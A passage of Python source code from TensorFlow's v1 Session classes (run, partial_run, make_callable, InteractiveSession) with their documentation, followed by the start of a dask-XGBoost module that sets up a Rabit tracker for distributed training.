`with sess.graph.as_default():` block to make `sess.graph` the default
graph.
Returns:
A context manager using this session as the default session.
"""
return ops.default_session(self)
def run(self, fetches, feed_dict=None, options=None, run_metadata=None):
"""Runs operations and evaluates tensors in `fetches`.
This method runs one "step" of TensorFlow computation, by
running the necessary graph fragment to execute every `Operation`
and evaluate every `Tensor` in `fetches`, substituting the values in
`feed_dict` for the corresponding input values.
The `fetches` argument may be a single graph element, or an arbitrarily
nested list, tuple, namedtuple, dict, or OrderedDict containing graph
elements at its leaves. A graph element can be one of the following types:
* A `tf.Operation`.
The corresponding fetched value will be `None`.
* A `tf.Tensor`.
The corresponding fetched value will be a numpy ndarray containing the
value of that tensor.
* A `tf.sparse.SparseTensor`.
The corresponding fetched value will be a
`tf.compat.v1.SparseTensorValue`
containing the value of that sparse tensor.
* A `get_tensor_handle` op. The corresponding fetched value will be a
numpy ndarray containing the handle of that tensor.
* A `string` which is the name of a tensor or operation in the graph.
The value returned by `run()` has the same shape as the `fetches` argument,
where the leaves are replaced by the corresponding values returned by
TensorFlow.
Example:
```python
a = tf.constant([10, 20])
b = tf.constant([1.0, 2.0])
# 'fetches' can be a singleton
v = session.run(a)
# v is the numpy array [10, 20]
# 'fetches' can be a list.
v = session.run([a, b])
# v is a Python list with 2 numpy arrays: the 1-D array [10, 20] and the
# 1-D array [1.0, 2.0]
# 'fetches' can be arbitrary lists, tuples, namedtuple, dicts:
MyData = collections.namedtuple('MyData', ['a', 'b'])
v = session.run({'k1': MyData(a, b), 'k2': [b, a]})
# v is a dict with
# v['k1'] is a MyData namedtuple with 'a' (the numpy array [10, 20]) and
# 'b' (the numpy array [1.0, 2.0])
# v['k2'] is a list with the numpy array [1.0, 2.0] and the numpy array
# [10, 20].
```
The optional `feed_dict` argument allows the caller to override
the value of tensors in the graph. Each key in `feed_dict` can be
one of the following types:
* If the key is a `tf.Tensor`, the
value may be a Python scalar, string, list, or numpy ndarray
that can be converted to the same `dtype` as that
tensor. Additionally, if the key is a
`tf.compat.v1.placeholder`, the shape of
the value will be checked for compatibility with the placeholder.
* If the key is a
`tf.sparse.SparseTensor`,
the value should be a
`tf.compat.v1.SparseTensorValue`.
* If the key is a nested tuple of `Tensor`s or `SparseTensor`s, the value
should be a nested tuple with the same structure that maps to their
corresponding values as above.
Each value in `feed_dict` must be convertible to a numpy array of the dtype
of the corresponding key.
The optional `options` argument expects a [`RunOptions`] proto. The options
allow controlling the behavior of this particular step (e.g. turning tracing
on).
The optional `run_metadata` argument expects a [`RunMetadata`] proto. When
appropriate, the non-Tensor output of this step will be collected there. For
example, when users turn on tracing in `options`, the profiled info will be
collected into this argument and passed back.
Args:
fetches: A single graph element, a list of graph elements, or a dictionary
whose values are graph elements or lists of graph elements (described
above).
feed_dict: A dictionary that maps graph elements to values (described
above).
options: A [`RunOptions`] protocol buffer
run_metadata: A [`RunMetadata`] protocol buffer
Returns:
Either a single value if `fetches` is a single graph element, or
a list of values if `fetches` is a list, or a dictionary with the
same keys as `fetches` if that is a dictionary (described above).
Order in which `fetches` operations are evaluated inside the call
is undefined.
Raises:
RuntimeError: If this `Session` is in an invalid state (e.g. has been
closed).
TypeError: If `fetches` or `feed_dict` keys are of an inappropriate type.
ValueError: If `fetches` or `feed_dict` keys are invalid or refer to a
`Tensor` that doesn't exist.
"""
options_ptr = tf_session.TF_NewBufferFromString(
compat.as_bytes(options.SerializeToString())) if options else None
run_metadata_ptr = tf_session.TF_NewBuffer() if run_metadata else None
try:
result = self._run(None, fetches, feed_dict, options_ptr,
run_metadata_ptr)
if run_metadata:
proto_data = tf_session.TF_GetBuffer(run_metadata_ptr)
run_metadata.ParseFromString(compat.as_bytes(proto_data))
finally:
if run_metadata_ptr:
tf_session.TF_DeleteBuffer(run_metadata_ptr)
if options:
tf_session.TF_DeleteBuffer(options_ptr)
return result
def partial_run(self, handle, fetches, feed_dict=None):
"""Continues the execution with more feeds and fetches.
This is EXPERIMENTAL and subject to change.
To use partial execution, a user first calls `partial_run_setup()` and
then a sequence of `partial_run()`. `partial_run_setup` specifies the
list of feeds and fetches that will be used in the subsequent
`partial_run` calls.
The optional `feed_dict` argument allows the caller to override
the value of tensors in the graph. See run() for more information.
Below is a simple example:
```python
a = array_ops.placeholder(dtypes.float32, shape=[])
b = array_ops.placeholder(dtypes.float32, shape=[])
c = array_ops.placeholder(dtypes.float32, shape=[])
r1 = math_ops.add(a, b)
r2 = math_ops.multiply(r1, c)
h = sess.partial_run_setup([r1, r2], [a, b, c])
res = sess.partial_run(h, r1, feed_dict={a: 1, b: 2})
res = sess.partial_run(h, r2, feed_dict={c: res})
```
Args:
handle: A handle for a sequence of partial runs.
fetches: A single graph element, a list of graph elements, or a dictionary
whose values are graph elements or lists of graph elements (see
documentation for `run`).
feed_dict: A dictionary that maps graph elements to values (described
above).
Returns:
Either a single value if `fetches` is a single graph element, or
a list of values if `fetches` is a list, or a dictionary with the
same keys as `fetches` if that is a dictionary
(see documentation for `run`).
Raises:
tf.errors.OpError: Or one of its subclasses on error.
"""
# TODO(touts): Support feeding and fetching the same tensor.
return self._run(handle, fetches, feed_dict, None, None)
def partial_run_setup(self, fetches, feeds=None):
"""Sets up a graph with feeds and fetches for partial run.
This is EXPERIMENTAL and subject to change.
Note that contrary to `run`, `feeds` only specifies the graph elements.
The tensors will be supplied by the subsequent `partial_run` calls.
Args:
fetches: A single graph element, or a list of graph elements.
feeds: A single graph element, or a list of graph elements.
Returns:
A handle for partial run.
Raises:
RuntimeError: If this `Session` is in an invalid state (e.g. has been
closed).
TypeError: If `fetches` or `feed_dict` keys are of an inappropriate type.
tf.errors.OpError: Or one of its subclasses if a TensorFlow error happens.
"""
def _feed_fn(feed):
for tensor_type, _, _, feed_fn in _REGISTERED_EXPANSIONS:
if isinstance(feed, tensor_type):
return feed_fn(feed)
raise TypeError('Feed argument %r has invalid type %r' %
(feed, type(feed)))
# Check session.
if self._closed:
raise RuntimeError('Attempted to use a closed Session.')
if self.graph.version == 0:
raise RuntimeError('The Session graph is empty. Add operations to the '
'graph before calling run().')
if feeds is None:
feeds = []
# Create request.
feed_list = []
# Validate and process feed_list.
is_list_feed = isinstance(feeds, (list, tuple))
if not is_list_feed:
feeds = [feeds]
for feed in feeds:
for subfeed in _feed_fn(feed):
try:
subfeed_t = self.graph.as_graph_element(
subfeed, allow_tensor=True, allow_operation=False)
# pylint: disable=protected-access
feed_list.append(subfeed_t._as_tf_output())
# pylint: enable=protected-access
except Exception as e:
e.message = ('Cannot interpret feed_list key as Tensor: ' + e.message)
e.args = (e.message,)
raise e
# Validate and process fetches.
# TODO(touts): Support feeding and fetching the same tensor.
fetch_handler = _FetchHandler(self._graph, fetches, {})
# Set up a graph with feeds and fetches for partial run.
def _setup_fn(session, feed_list, fetch_list, target_list):
self._extend_graph()
return tf_session.TF_SessionPRunSetup_wrapper(session, feed_list,
fetch_list, target_list)
# pylint: disable=protected-access
final_fetches = [t._as_tf_output() for t in fetch_handler.fetches()]
final_targets = [op._c_op for op in fetch_handler.targets()]
# pylint: enable=protected-access
return self._do_call(_setup_fn, self._session, feed_list, final_fetches,
final_targets)
def _run(self, handle, fetches, feed_dict, options, run_metadata):
"""Perform either run or partial_run, depending the presence of `handle`."""
def _feed_fn(feed, feed_val):
for tensor_type, _, feed_fn, _ in _REGISTERED_EXPANSIONS:
if isinstance(feed, tensor_type):
return feed_fn(feed, feed_val)
raise TypeError('Feed argument %r has invalid type %r' %
(feed, type(feed)))
# Check session.
if self._closed:
raise RuntimeError('Attempted to use a closed Session.')
if self.graph.version == 0:
raise RuntimeError('The Session graph is empty. Add operations to the '
'graph before calling run().')
# Create request.
feed_dict_tensor = {}
feed_map = {}
# Validate and process feed_dict.
feed_handles = {}
if feed_dict:
feed_dict = nest.flatten_dict_items(feed_dict)
for feed, feed_val in feed_dict.items():
for subfeed, subfeed_val in _feed_fn(feed, feed_val):
try:
subfeed_t = self.graph.as_graph_element(
subfeed, allow_tensor=True, allow_operation=False)
except Exception as e:
raise TypeError('Cannot interpret feed_dict key as Tensor: ' +
e.args[0])
if isinstance(subfeed_val, ops.Tensor):
raise TypeError('The value of a feed cannot be a tf.Tensor object. '
'Acceptable feed values include Python scalars, '
'strings, lists, numpy ndarrays, or TensorHandles. '
'For reference, the tensor object was ' +
str(feed_val) + ' which was passed to the '
'feed with key ' + str(feed) + '.')
subfeed_dtype = subfeed_t.dtype.as_numpy_dtype
if isinstance(subfeed_val, int) and _convert_to_numpy_obj(
subfeed_dtype, subfeed_val) != subfeed_val:
raise TypeError(
'Type of feed value ' + str(subfeed_val) + ' with type ' +
str(type(subfeed_val)) +
' is not compatible with Tensor type ' + str(subfeed_dtype) +
'. Try explicitly setting the type of the feed tensor'
' to a larger type (e.g. int64).')
is_tensor_handle_feed = isinstance(subfeed_val,
session_ops.TensorHandle)
if is_tensor_handle_feed:
np_val = subfeed_val.to_numpy_array()
feed_handles[subfeed_t.ref()] = subfeed_val
else:
np_val = np.asarray(subfeed_val, dtype=subfeed_dtype)
if (not is_tensor_handle_feed and
not subfeed_t.get_shape().is_compatible_with(np_val.shape)):
raise ValueError(
'Cannot feed value of shape %r for Tensor %r, '
'which has shape %r' %
(np_val.shape, subfeed_t.name, str(subfeed_t.get_shape())))
if not self.graph.is_feedable(subfeed_t):
raise ValueError('Tensor %s may not be fed.' % subfeed_t)
feed_dict_tensor[subfeed_t.ref()] = np_val
feed_map[compat.as_bytes(subfeed_t.name)] = (subfeed_t, subfeed_val)
# Create a fetch handler to take care of the structure of fetches.
fetch_handler = _FetchHandler(
self._graph, fetches, feed_dict_tensor, feed_handles=feed_handles)
# Run request and get response.
# We need to keep the returned movers alive for the following _do_run().
# These movers are no longer needed when _do_run() completes, and
# are deleted when `movers` goes out of scope when this _run() ends.
# TODO(yuanbyu, keveman): Revisit whether we should just treat feeding
# of a handle from a different device as an error.
_ = self._update_with_movers(feed_dict_tensor, feed_map)
final_fetches = fetch_handler.fetches()
final_targets = fetch_handler.targets()
# We only want to really perform the run if fetches or targets are provided,
# or if the call is a partial run that specifies feeds.
if final_fetches or final_targets or (handle and feed_dict_tensor):
results = self._do_run(handle, final_targets, final_fetches,
feed_dict_tensor, options, run_metadata)
else:
results = []
return fetch_handler.build_results(self, results)
def make_callable(self, fetches, feed_list=None, accept_options=False):
"""Returns a Python callable that runs a particular step.
The returned callable will take `len(feed_list)` arguments whose types
must be compatible feed values for the respective elements of `feed_list`.
For example, if element `i` of `feed_list` is a `tf.Tensor`, the `i`th
argument to the returned callable must be a numpy ndarray (or something
convertible to an ndarray) with matching element type and shape. See
`tf.Session.run` for details of the allowable feed key and value types.
The returned callable will have the same return type as
`tf.Session.run(fetches, ...)`. For example, if `fetches` is a `tf.Tensor`,
the callable will return a numpy ndarray; if `fetches` is a `tf.Operation`,
it will return `None`.
Args:
fetches: A value or list of values to fetch. See `tf.Session.run` for
details of the allowable fetch types.
feed_list: (Optional.) A list of `feed_dict` keys. See `tf.Session.run`
for details of the allowable feed key types.
accept_options: (Optional.) If `True`, the returned `Callable` will be
able to accept `tf.compat.v1.RunOptions` and `tf.compat.v1.RunMetadata`
as optional keyword arguments `options` and `run_metadata`,
respectively, with the same syntax and semantics as `tf.Session.run`,
which is useful for certain use cases (profiling and debugging) but will
result in measurable slowdown of the `Callable`'s
performance. Default: `False`.
Returns:
A function that when called will execute the step defined by
`feed_list` and `fetches` in this session.
Raises:
TypeError: If `fetches` or `feed_list` cannot be interpreted
as arguments to `tf.Session.run`.
"""
if feed_list is not None:
if not isinstance(feed_list, (list, tuple)):
raise TypeError('`feed_list` must be a list or tuple.')
# Delegate any non-empty feed lists to the existing `run()` logic.
# TODO(mrry): Refactor the feed handling logic from
# `Session._run()` so that we can convert the feeds to a list of
# strings here.
def _generic_run(*feed_args, **kwargs):
feed_dict = {
feed: feed_val for feed, feed_val in zip(feed_list, feed_args)
}
return self.run(fetches, feed_dict=feed_dict, **kwargs)
return _generic_run
# Ensure any changes to the graph are reflected in the runtime.
# Note that we don't need to do this on subsequent calls to the
# returned object, because the arguments to `fetches` must already be
# in the graph.
self._extend_graph()
# Create a fetch handler to take care of the structure of fetches.
fetch_handler = _FetchHandler(self._graph, fetches, {})
# pylint: disable=protected-access
fetch_list = [t._as_tf_output() for t in fetch_handler.fetches()]
target_list = [op._c_op for op in fetch_handler.targets()]
# pylint: enable=protected-access
def _callable_template_with_options_and_metadata(fetch_list,
target_list,
fetch_handler,
options=None,
run_metadata=None):
"""Template callable that accepts RunOptions and RunMetadata."""
options_ptr = tf_session.TF_NewBufferFromString(
compat.as_bytes(options.SerializeToString())) if options else None
run_metadata_ptr = tf_session.TF_NewBuffer() if run_metadata else None
try:
results = self._call_tf_sessionrun(options_ptr, {}, fetch_list,
target_list, run_metadata_ptr)
if fetch_handler:
results = fetch_handler.build_results(self, results)
else:
results = results[0] if results else None
if run_metadata:
proto_data = tf_session.TF_GetBuffer(run_metadata_ptr)
run_metadata.ParseFromString(compat.as_bytes(proto_data))
finally:
if run_metadata_ptr:
tf_session.TF_DeleteBuffer(run_metadata_ptr)
if options:
tf_session.TF_DeleteBuffer(options_ptr)
return results
if accept_options:
return functools.partial(_callable_template_with_options_and_metadata,
fetch_list, target_list, fetch_handler)
elif isinstance(fetches, ops.Operation):
# Special case for fetching a single operation, because the
# function will have no return value.
assert not fetch_list
assert len(target_list) == 1
def _single_operation_run():
self._call_tf_sessionrun(None, {}, [], target_list, None)
return _single_operation_run
elif isinstance(fetches, ops.Tensor):
# Special case for fetching a single tensor, because the
# function can return the result of `TF_Run()` directly.
assert len(fetch_list) == 1
assert not target_list
def _single_tensor_run():
results = self._call_tf_sessionrun(None, {}, fetch_list, [], None)
return results[0]
return _single_tensor_run
else:
# In all other cases, we must use `fetch_handler` to build the
# results for us.
def _fetch_handler_run():
results = self._call_tf_sessionrun(None, {}, fetch_list, target_list,
None)
return fetch_handler.build_results(self, results)
return _fetch_handler_run
# Captures the name of a node in an error status. The regex below matches
# both the old and the new formats:
# Old format: [[Node: <node_name> = ...]]
# New format: [[{{node <node_name>}} = ...]]
_NODEDEF_NAME_RE = re.compile(
r'\[\[(Node: )?(\{\{node )?([^\} ]*)(\}\})?\s*=*')
def _do_run(self, handle, target_list, fetch_list, feed_dict, options,
run_metadata):
"""Runs a step based on the given fetches and feeds.
Args:
handle: a handle for partial_run. None if this is just a call to run().
target_list: A list of operations to be run, but not fetched.
fetch_list: A list of tensors to be fetched.
feed_dict: A dictionary that maps tensors to numpy ndarrays.
options: A (pointer to a) [`RunOptions`] protocol buffer, or None
run_metadata: A (pointer to a) [`RunMetadata`] protocol buffer, or None
Returns:
A list of numpy ndarrays, corresponding to the elements of
`fetch_list`. If the ith element of `fetch_list` contains the
name of an operation, the first Tensor output of that operation
will be returned for that element.
Raises:
tf.errors.OpError: Or one of its subclasses on error.
"""
# pylint: disable=protected-access
feeds = dict((t.deref()._as_tf_output(), v) for t, v in feed_dict.items())
fetches = [t._as_tf_output() for t in fetch_list]
targets = [op._c_op for op in target_list]
# pylint: enable=protected-access
def _run_fn(feed_dict, fetch_list, target_list, options, run_metadata):
# Ensure any changes to the graph are reflected in the runtime.
self._extend_graph()
return self._call_tf_sessionrun(options, feed_dict, fetch_list,
target_list, run_metadata)
def _prun_fn(handle, feed_dict, fetch_list):
if target_list:
raise RuntimeError('partial_run() requires empty target_list.')
return self._call_tf_sessionprun(handle, feed_dict, fetch_list)
if handle is None:
return self._do_call(_run_fn, feeds, fetches, targets, options,
run_metadata)
else:
return self._do_call(_prun_fn, handle, feeds, fetches)
def _do_call(self, fn, *args):
try:
return fn(*args)
except errors.OpError as e:
message = compat.as_text(e.message)
m = BaseSession._NODEDEF_NAME_RE.search(message)
node_def = None
op = None
if m is not None:
node_name = m.group(3)
try:
op = self._graph.get_operation_by_name(node_name)
node_def = op.node_def
except KeyError:
pass
message = error_interpolation.interpolate(message, self._graph)
if 'only supports NHWC tensor format' in message:
message += ('\nA possible workaround: Try disabling Grappler optimizer'
'\nby modifying the config for creating the session eg.'
'\nsession_config.graph_options.rewrite_options.'
'disable_meta_optimizer = True')
raise type(e)(node_def, op, message)
def _extend_graph(self):
with self._graph._session_run_lock(): # pylint: disable=protected-access
tf_session.ExtendSession(self._session)
# The threshold to run garbage collection to delete dead tensors.
_DEAD_HANDLES_THRESHOLD = 10
def _register_dead_handle(self, handle):
# Register a dead handle in the session. Delete the dead tensors when
# the number of dead tensors exceeds certain threshold.
tensors_to_delete = None
with self._delete_lock:
self._dead_handles.append(handle)
if len(self._dead_handles) == BaseSession._DEAD_HANDLES_THRESHOLD:
tensors_to_delete = self._dead_handles
self._dead_handles = []
# Delete the dead tensors.
if tensors_to_delete:
feeds = {}
fetches = []
for deleter_key, tensor_handle in enumerate(tensors_to_delete):
holder, deleter = session_ops._get_handle_deleter(
self.graph, deleter_key, tensor_handle)
feeds[holder] = tensor_handle
fetches.append(deleter)
self.run(fetches, feed_dict=feeds)
def _update_with_movers(self, feed_dict, feed_map):
# If a tensor handle that is fed to a device incompatible placeholder,
# we move the tensor to the right device, generate a new tensor handle,
# and update `feed_dict` to use the new handle.
handle_movers = []
for feed_name, val in feed_map.items():
mover = session_ops._get_handle_mover(self.graph, *val)
if mover:
handle_movers.append((feed_name, val[1], mover))
# Transfer a tensor to the right device if needed.
if not handle_movers:
return []
else:
feeds = {}
fetches = []
for _, handle, mover in handle_movers:
feeds[mover[0]] = handle
fetches.append(mover[1])
handles = self.run(fetches, feed_dict=feeds)
for handle_mover, handle in zip(handle_movers, handles):
np_val = np.array(handle.handle, dtype=np.object)
feed_name = handle_mover[0]
feed_tensor = feed_map[feed_name][0]
feed_dict[feed_tensor.ref()] = np_val
return handles
def _call_tf_sessionrun(self, options, feed_dict, fetch_list, target_list,
run_metadata):
return tf_session.TF_SessionRun_wrapper(self._session, options, feed_dict,
fetch_list, target_list,
run_metadata)
def _call_tf_sessionprun(self, handle, feed_dict, fetch_list):
return tf_session.TF_SessionPRun_wrapper(self._session, handle, feed_dict,
fetch_list)
# pylint: disable=protected-access
class _Callable(object):
"""Experimental wrapper for the C++ `Session::MakeCallable()` API."""
def __init__(self, session, callable_options):
self._session = session
self._handle = None
options_ptr = tf_session.TF_NewBufferFromString(
compat.as_bytes(callable_options.SerializeToString()))
try:
self._handle = tf_session.TF_SessionMakeCallable(
session._session, options_ptr)
finally:
tf_session.TF_DeleteBuffer(options_ptr)
def __call__(self, *args, **kwargs):
# TODO(b/74355905): Support argument and return value nested structures,
# and tensor-like objects such as SparseTensors.
run_metadata = kwargs.get('run_metadata', None)
try:
run_metadata_ptr = tf_session.TF_NewBuffer() if run_metadata else None
ret = tf_session.TF_SessionRunCallable(self._session._session,
self._handle, args,
run_metadata_ptr)
if run_metadata:
proto_data = tf_session.TF_GetBuffer(run_metadata_ptr)
run_metadata.ParseFromString(compat.as_bytes(proto_data))
finally:
if run_metadata_ptr:
tf_session.TF_DeleteBuffer(run_metadata_ptr)
return ret
def __del__(self):
# NOTE(mrry): It is possible that `self._session.__del__()` could be
# called before this destructor, in which case `self._session._session`
# will be `None`.
if (self._handle is not None and self._session._session is not None and
not self._session._closed):
tf_session.TF_SessionReleaseCallable(self._session._session,
self._handle)
# pylint: enable=protected-access
# TODO(b/74355905): Reimplement `Session.make_callable()` using this method
# where possible.
def _make_callable_from_options(self, callable_options):
"""Returns a handle to a "callable" with the given options.
Args:
callable_options: A `CallableOptions` protocol buffer message describing
the computation that will be performed by the callable.
Returns:
A handle to the new callable.
"""
self._extend_graph()
return BaseSession._Callable(self, callable_options)
@tf_export(v1=['Session'])
class Session(BaseSession):
"""A class for running TensorFlow operations.
A `Session` object encapsulates the environment in which `Operation`
objects are executed, and `Tensor` objects are evaluated. For
example:
```python
tf.compat.v1.disable_eager_execution() # need to disable eager in TF2.x
# Build a graph.
a = tf.constant(5.0)
b = tf.constant(6.0)
c = a * b
# Launch the graph in a session.
sess = tf.compat.v1.Session()
# Evaluate the tensor `c`.
print(sess.run(c)) # prints 30.0
```
A session may own resources, such as
`tf.Variable`, `tf.queue.QueueBase`,
and `tf.compat.v1.ReaderBase`. It is important to release
these resources when they are no longer required. To do this, either
invoke the `tf.Session.close` method on the session, or use
the session as a context manager. The following two examples are
equivalent:
```python
# Using the `close()` method.
sess = tf.compat.v1.Session()
sess.run(...)
sess.close()
# Using the context manager.
with tf.compat.v1.Session() as sess:
sess.run(...)
```
The
[`ConfigProto`](https://www.tensorflow.org/code/tensorflow/core/protobuf/config.proto)
protocol buffer exposes various configuration options for a
session. For example, to create a session that uses soft constraints
for device placement, and log the resulting placement decisions,
create a session as follows:
```python
# Launch the graph in a session that allows soft device placement and
# logs the placement decisions.
sess = tf.compat.v1.Session(config=tf.compat.v1.ConfigProto(
allow_soft_placement=True,
log_device_placement=True))
```
"""
def __init__(self, target='', graph=None, config=None):
"""Creates a new TensorFlow session.
If no `graph` argument is specified when constructing the session,
the default graph will be launched in the session. If you are
using more than one graph (created with `tf.Graph()`) in the same
process, you will have to use different sessions for each graph,
but each graph can be used in multiple sessions. In this case, it
is often clearer to pass the graph to be launched explicitly to
the session constructor.
Args:
target: (Optional.) The execution engine to connect to. Defaults to using
an in-process engine. See
[Distributed TensorFlow](https://tensorflow.org/deploy/distributed) for
more examples.
graph: (Optional.) The `Graph` to be launched (described above).
config: (Optional.) A
[`ConfigProto`](https://www.tensorflow.org/code/tensorflow/core/protobuf/config.proto)
protocol buffer with configuration options for the session.
"""
super(Session, self).__init__(target, graph, config=config)
# NOTE(mrry): Create these on first `__enter__` to avoid a reference cycle.
self._default_graph_context_manager = None
self._default_session_context_manager = None
def __enter__(self):
if self._default_graph_context_manager is None:
self._default_graph_context_manager = self.graph.as_default()
else:
raise RuntimeError('Session context managers are not re-entrant. '
'Use `Session.as_default()` if you want to enter '
'a session multiple times.')
if self._default_session_context_manager is None:
self._default_session_context_manager = self.as_default()
self._default_graph_context_manager.__enter__()
return self._default_session_context_manager.__enter__()
def __exit__(self, exec_type, exec_value, exec_tb):
if exec_type is errors.OpError:
logging.error('Session closing due to OpError: %s', (exec_value,))
try:
self._default_session_context_manager.__exit__(exec_type, exec_value,
exec_tb)
except RuntimeError as error:
if error == exec_value:
# NOTE(skyewm): for some reason, in Python3,
# _default_session_context_manager.__exit__ will re-raise the "not
# re-entrant" exception raised in __enter__ above (note that if we're
# here, we're in the outer session context manager, since __exit__ is
# not called when __enter__ raises an exception). We still want to
# continue cleaning up this context manager before the exception is
# further propagated, so we ignore it here (note that it'll continue
# being propagated after this method completes).
pass
else:
raise
self._default_graph_context_manager.__exit__(exec_type, exec_value, exec_tb)
self._default_session_context_manager = None
self._default_graph_context_manager = None
# If we are closing due to an exception, set a time limit on our Close() to
# avoid blocking forever.
# TODO(b/120204635) remove this when deadlock is fixed.
if exec_type:
close_thread = threading.Thread(
name='SessionCloseThread', target=self.close)
close_thread.daemon = True
close_thread.start()
close_thread.join(30.0)
if close_thread.is_alive():
logging.error(
'Session failed to close after 30 seconds. Continuing after this '
'point may leave your program in an undefined state.')
else:
self.close()
@staticmethod
def reset(target, containers=None, config=None):
"""Resets resource containers on `target`, and close all connected sessions.
A resource container is distributed across all workers in the
same cluster as `target`. When a resource container on `target`
is reset, resources associated with that container will be cleared.
In particular, all Variables in the container will become undefined:
they lose their values and shapes.
NOTE:
(i) reset() is currently only implemented for distributed sessions.
(ii) Any sessions on the master named by `target` will be closed.
If no resource containers are provided, all containers are reset.
Args:
target: The execution engine to connect to.
containers: A list of resource container name strings, or `None` if all of
all the containers are to be reset.
config: (Optional.) Protocol buffer with configuration options.
Raises:
tf.errors.OpError: Or one of its subclasses if an error occurs while
resetting containers.
"""
if target is not None:
target = compat.as_bytes(target)
if containers is not None:
containers = [compat.as_bytes(c) for c in containers]
else:
containers = []
tf_session.TF_Reset(target, containers, config)
@tf_export(v1=['InteractiveSession'])
class InteractiveSession(BaseSession):
"""A TensorFlow `Session` for use in interactive contexts, such as a shell.
The only difference with a regular `Session` is that an `InteractiveSession`
installs itself as the default session on construction.
The methods `tf.Tensor.eval`
and `tf.Operation.run`
will use that session to run ops.
This is convenient in interactive shells and [IPython
notebooks](http://ipython.org), as it avoids having to pass an explicit
`Session` object to run ops.
For example:
```python
sess = tf.compat.v1.InteractiveSession()
a = tf.constant(5.0)
b = tf.constant(6.0)
c = a * b
# We can just use 'c.eval()' without passing 'sess'
print(c.eval())
sess.close()
```
Note that a regular session installs itself as the default session when it
is created in a `with` statement. The common usage in non-interactive
programs is to follow that pattern:
```python
a = tf.constant(5.0)
b = tf.constant(6.0)
c = a * b
with tf.compat.v1.Session():
# We can also use 'c.eval()' here.
print(c.eval())
```
"""
_count_lock = threading.Lock()
_active_session_count = 0 # GUARDED_BY(_count_lock)
def __init__(self, target='', graph=None, config=None):
"""Creates a new interactive TensorFlow session.
If no `graph` argument is specified when constructing the session,
the default graph will be launched in the session. If you are
using more than one graph (created with `tf.Graph()`) in the same
process, you will have to use different sessions for each graph,
but each graph can be used in multiple sessions. In this case, it
is often clearer to pass the graph to be launched explicitly to
the session constructor.
Args:
target: (Optional.) The execution engine to connect to. Defaults to using
an in-process engine.
graph: (Optional.) The `Graph` to be launched (described above).
config: (Optional) `ConfigProto` proto used to configure the session.
"""
if not config:
# If config is not provided, choose some reasonable defaults for
# interactive use:
#
# - Grow GPU memory as needed at the cost of fragmentation.
gpu_options = config_pb2.GPUOptions(allow_growth=True)
config = config_pb2.ConfigProto(gpu_options=gpu_options)
# Interactive sessions always place pruned graphs.
config.graph_options.place_pruned_graph = True
super(InteractiveSession, self).__init__(target, graph, config)
with InteractiveSession._count_lock:
if InteractiveSession._active_session_count > 0:
warnings.warn('An interactive session is already active. This can '
'cause out-of-memory errors in some cases. You must '
'explicitly call `InteractiveSession.close()` to release '
'resources held by the other session(s).')
InteractiveSession._active_session_count += 1
# NOTE(mrry): We do not use `Session._closed` here because it has unhelpful
# semantics (in particular, it is not set to true if `Session.close()` is
# called on a session that has not been "opened" by running a step) and we
# cannot change those semantics without breaking existing code.
self._explicitly_closed = False
self._default_session = self.as_default()
self._default_session.enforce_nesting = False
self._default_session.__enter__()
self._explicit_graph = graph
if self._explicit_graph is not None:
self._default_graph = graph.as_default()
self._default_graph.enforce_nesting = False
self._default_graph.__enter__()
def close(self):
"""Closes an `InteractiveSession`."""
super(InteractiveSession, self).close()
with InteractiveSession._count_lock:
if not self._explicitly_closed:
InteractiveSession._active_session_count -= 1
self._explicitly_closed = True
else:
return
if self._explicit_graph is not None:
self._default_graph.__exit__(None, None, None)
self._default_graph = None
self._default_session.__exit__(None, None, None)
self._default_session = None
|
core.py
|
import logging
from collections import defaultdict
from threading import Thread
import dask.array as da
import dask.dataframe as dd
import numpy as np
import pandas as pd
import xgboost as xgb
from dask import delayed
from dask.distributed import default_client, wait
from toolz import assoc, first
from tornado import gen
from .tracker import RabitTracker
try:
import sparse
import scipy.sparse as ss
except ImportError:
sparse = False
ss = False
logger = logging.getLogger(__name__)
def parse_host_port(address):
if "://" in address:
address = address.rsplit("://", 1)[1]
host, port = address.split(":")
port = int(port)
return host, port
def start_tracker(host, n_workers):
""" Start Rabit tracker """
env = {"DMLC_NUM_WORKER": n_workers}
rabit = RabitTracker(hostIP=host, nslave=n_workers)
env.update(rabit.slave_envs())
rabit.start(n_workers)
logger.info("Starting Rabit Tracker")
thread = Thread(target=rabit.join)
thread.daemon = True
thread.start()
return env
def concat(L):
if isinstance(L[0], np.ndarray):
return np.concatenate(L, axis=0)
elif isinstance(L[0], (pd.DataFrame, pd.Series)):
return pd.concat(L, axis=0)
elif ss and isinstance(L[0], ss.spmatrix):
return ss.vstack(L, format="csr")
elif sparse and isinstance(L[0], sparse.SparseArray):
return sparse.concatenate(L, axis=0)
else:
raise TypeError(
"Data must be either numpy arrays or pandas dataframes"
". Got %s" % type(L[0])
)
def train_part(
env,
param,
list_of_parts,
dmatrix_kwargs=None,
eval_set=None,
missing=None,
n_jobs=None,
sample_weight_eval_set=None,
**kwargs
):
"""
Run part of XGBoost distributed workload
This starts an xgboost.rabit slave, trains on provided data, and then shuts
down the xgboost.rabit slave
Returns
-------
model if rank zero, None otherwise
"""
data, labels = zip(*list_of_parts) # Prepare data
data = concat(data) # Concatenate many parts into one
labels = concat(labels)
if dmatrix_kwargs is None:
dmatrix_kwargs = {}
dmatrix_kwargs["feature_names"] = getattr(data, "columns", None)
dtrain = xgb.DMatrix(data, labels, **dmatrix_kwargs)
evals = _package_evals(
eval_set,
sample_weight_eval_set=sample_weight_eval_set,
missing=missing,
n_jobs=n_jobs,
)
args = [("%s=%s" % item).encode() for item in env.items()]
xgb.rabit.init(args)
try:
logger.info("Starting Rabit, Rank %d", xgb.rabit.get_rank())
bst = xgb.train(param, dtrain, evals=evals, **kwargs)
if xgb.rabit.get_rank() == 0: # Only return from one worker
result = bst
else:
result = None
finally:
xgb.rabit.finalize()
return result
def _package_evals(
eval_set, sample_weight_eval_set=None, missing=None, n_jobs=None
):
if eval_set is not None:
if sample_weight_eval_set is None:
sample_weight_eval_set = [None] * len(eval_set)
evals = list(
xgb.DMatrix(
data,
label=label,
missing=missing,
weight=weight,
nthread=n_jobs,
)
for ((data, label), weight) in zip(
eval_set, sample_weight_eval_set
)
)
evals = list(
zip(evals, ["validation_{}".format(i) for i in range(len(evals))])
)
else:
evals = ()
return evals
@gen.coroutine
def _train(client, params, data, labels, dmatrix_kwargs={}, **kwargs):
"""
Asynchronous version of train
See Also
--------
train
"""
# Break apart Dask.array/dataframe into chunks/parts
data_parts = data.to_delayed()
label_parts = labels.to_delayed()
if isinstance(data_parts, np.ndarray):
assert data_parts.shape[1] == 1
data_parts = data_parts.flatten().tolist()
